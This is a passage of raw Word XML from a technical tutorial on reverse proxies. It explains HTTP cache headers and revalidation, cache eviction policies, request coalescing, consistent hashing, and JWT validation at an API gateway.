        <w:t> for each unique combination of the Vary-specified headers. Cache key = URL + Accept-Encoding value + Accept-Language value. This prevents serving a gzip-compressed response to a client that doesn't support gzip, or French content to an English-language client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E114A84" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Vary: * problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Vary: * means the response varies based on all headers (or unpredictably) — the proxy must not cache it. Servers that set Vary: Cookie for personalized content effectively prevent caching of any response that depends on user-specific cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08649388" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache freshness and validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157C7943" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TTL-based freshness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344C34C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60053125" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Cache-Control: max-age=3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B3FEB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The response can be served from cache for 3600 seconds (1 hour) without contacting the origin. The proxy tracks the response's age (time since it was cached). If age &lt; max-age, serve from cache. If age ≥ max-age, the response is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stale</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — must revalidate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FEE4A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Conditional requests for revalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C357781" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a cached response is stale, rather than re-fetching the entire response, the proxy sends a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conditional request</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A367BFD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the original response had ETag: "abc123":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F5081" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03005C87" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>GET /resource HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA5D97" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If-None-Match: "abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D154CB1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the resource hasn't changed, the origin responds with 304 Not Modified (no body) — the proxy refreshes the TTL and serves the cached body. The round-trip only transfers headers, not the full response body. This is dramatically more efficient for large responses (images, videos, large JSON) that change rarely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552BDCD2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the original response had Last-Modified: Mon, 01 Jan 2024 00:00:00 GMT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC338D0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726732D7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>GET /resource HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C16538B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If-Modified-Since: Mon, 01 Jan 2024 00:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FFBFF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Origin responds 304 Not Modified if unchanged, 200 OK with new content if changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C35342" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ETags are stronger than Last-Modified:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Multiple modifications within the same second produce the same Last-Modified timestamp but different ETags. ETags are hash-based (MD5 or similar of response content) — they change whenever content changes, regardless of time granularity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5DDAED" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stale-while-revalidate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A488AC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BE867" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Cache-Control: max-age=60, stale-while-revalidate=600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AFA0EA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Serve the stale response immediately (zero latency) while asynchronously revalidating in the background. For up to 600 seconds past the max-age, the proxy can serve stale content while fetching a fresh copy. After 660 seconds total, must wait for revalidation before serving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD279F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This dramatically improves cache HIT RATE and reduces perceived latency at the cost of briefly serving slightly stale content — an acceptable trade-off for most non-critical content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A5C6D8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stale-if-error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA1C44" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB47B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Cache-Control: max-age=60, stale-if-error=86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA868E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the origin is unreachable or returns a 5xx error, serve the stale cached response for up to 86400 seconds (24 hours). This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>grace mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the cache acts as a reliability buffer when the origin fails. Users see potentially stale content rather than error pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238B7F9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Storage Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F6A2C0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Two-level cache (memory + disk):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE6AAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Memory cache (L1):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Fast but limited. Stores the most frequently accessed and recently accessed responses. Access time: microseconds. Size: configured to a fraction of available RAM (e.g., 512MB–8GB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF6143" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Disk cache (L2):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Slower but larger. Stores the broader working set. Access time: sub-millisecond (NVMe SSD) to milliseconds (spinning disk). Size: hundreds of GB to TB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA32F31" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache eviction policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38563B33" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LRU (Least Recently Used):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The standard. When cache is full, evict the entry accessed least recently. Implemented as a doubly-linked list (maintains access order) + hash map (O(1) lookup). On access, move the entry to the list head. On eviction, remove the tail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29E98B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LIRS (Low Inter-reference Recency Set):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A more sophisticated replacement for LRU that handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scan resistance</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — LRU is defeated by large sequential scans (scanning a huge file evicts all cached entries, even frequently accessed ones, because the scan entries temporarily become "most recently used"). LIRS distinguishes between </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hot</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (frequently reaccessed) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cold</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (recently accessed but may not be reaccessed) entries. Hot entries are protected from eviction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1676A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Segmented LRU (S-LRU):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Squid uses this. Two segments: a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>probationary segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for newly cached entries and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>protected segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for entries that have been accessed at least twice. New entries enter probationary. On second access, they're promoted to protected. Eviction targets probationary entries first. This handles the one-hit wonder problem — entries accessed once and never again don't pollute the protected segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79193940" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thundering herd / cache stampede at the proxy layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B65418" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a cached entry expires and multiple clients simultaneously request it, all requests miss the cache and fan out to the origin simultaneously — a stampede. For a high-traffic proxy, this can mean thousands of simultaneous requests hitting the origin for a single expired resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C502B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request coalescing (collapse):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090548AD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy detects multiple simultaneous requests for the same cache-missed resource, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>forwards only one</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to the origin, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>queues the other requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> locally. When the origin responds, the proxy serves the response to all queued requests simultaneously. This is also called </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>request collapsing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC1B871" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Internally: when a cache miss occurs, the proxy creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>promise/waiter list</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for the cache key. The first miss triggers the origin fetch. Subsequent misses for the same key are added to the waiter list. On origin response: populate cache, notify all waiters. Waiters receive the response from the proxy cache (now populated) rather than from the origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD853D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent hashing for distributed proxy caches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D6C39" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Multiple proxy instances (for HA and throughput) must coordinate caching to avoid each instance independently caching the same content. With N proxy instances each caching independently:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AD923C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Cache hit rate depends on whether the client request reaches the same proxy instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFE53B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If requests are load-balanced round-robin, each instance only caches 1/N of requests — very low hit rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0899F5AF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution: Consistent hash the request URL to a specific proxy instance.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> All requests for /image/cat.jpg always go to proxy instance 3 (determined by hashing the URL). Proxy instance 3 has a high hit rate for this URL because all requests for it come to it. Other proxy instances don't cache this URL at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1572E7C2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This is implemented with </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>consistent hashing-based load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> among proxy instances, not round-robin. The client-facing load balancer (or DNS) routes each URL to a deterministic proxy instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7431C541" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="43A59E92">
          <v:rect id="_x0000_i3057" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34694F44" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. API Gateway — The Advanced Reverse Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712B8E6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>An API gateway is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>specialized reverse proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for API traffic, adding capabilities beyond basic request forwarding: authentication, rate limiting, transformation, aggregation, and developer-facing features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C1730" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication and Authorization at the Proxy Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662258CA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWT validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB51ABE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The API gateway validates </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSON Web Tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (JWTs) in request headers before forwarding to the backend. JWT structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CFD14E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D4E7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Header.Payload.Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8F13E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJ1c2VyMTIzIn0.signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABBD93" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44949960" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Extracts the JWT from the Authorization: Bearer &lt;token&gt; header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CCE413" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Decodes the header to get the signing algorithm (RS256, HS256, ES256).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36566B78" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Fetches the signing public key from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWKS (JSON Web Key Set)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> endpoint (cached with TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C65A7C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Verifies the signature cryptographically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E20DDA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Validates claims: exp (expiry), iss (issuer), aud (audience), nbf (not before).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A4381" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If valid: extracts claims (user ID, roles, scopes), injects them as headers to the backend (X-User-ID: 123, X-User-Scopes: read:orders write:orders).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C8780" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If invalid: returns 401 Unauthorized without forwarding to the backend.</w:t>
      </w:r>
    </w:p>
